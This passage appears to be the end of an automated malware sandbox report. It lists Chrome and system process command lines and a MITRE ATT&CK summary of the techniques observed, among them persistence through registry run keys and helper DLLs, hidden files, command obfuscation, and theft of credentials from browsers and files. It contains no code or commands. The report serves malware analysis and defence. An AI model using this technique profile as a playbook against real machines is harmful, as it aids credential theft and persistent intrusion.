  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6276)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 4104)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5140)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6676)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4976,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6012)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5112)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4676 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6944)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4664 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5508)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5116,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4920 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5288)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5084 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5400)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5096,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4356 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6212)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3112,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5292)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3140,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3448 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 1496)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3460,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 7116)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5656,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 2760)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3484,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5488 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5812)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5744,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5812 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6584)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=3244,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5712 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 2840)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5728,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5168)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5692,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 5308)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5468,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe (depth 2, PID 6168)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5132,i,7464359222630130101,7038844760020183408,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5160 /prefetch:8

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe (depth 1, PID 7144)
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\svchost.exe (depth 1, PID 6884)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
MITRE ATT&CK Enterprise v15 (technique counts in parentheses)

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Persistence
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Privilege Escalation
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Event Triggered Execution (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Defense Evasion
  Hide Artifacts (3)
    Hidden Files and Directories (3)
  Modify Registry (3)
  Obfuscated Files or Information (1)
    Command Obfuscation (1)

Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (3)
    Credentials In Files (3)

Discovery
  Browser Information Discovery (1)
  Peripheral Device Discovery (1)
  Process Discovery (1)
  Query Registry (6)
  Remote System Discovery (1)
  System Information Discovery (8)
  System Location Discovery (1)
    System Language Discovery (1)
  System Network Configuration Discovery (2)
    Internet Connection Discovery (1)
    Wi-Fi Discovery (1)
Downloads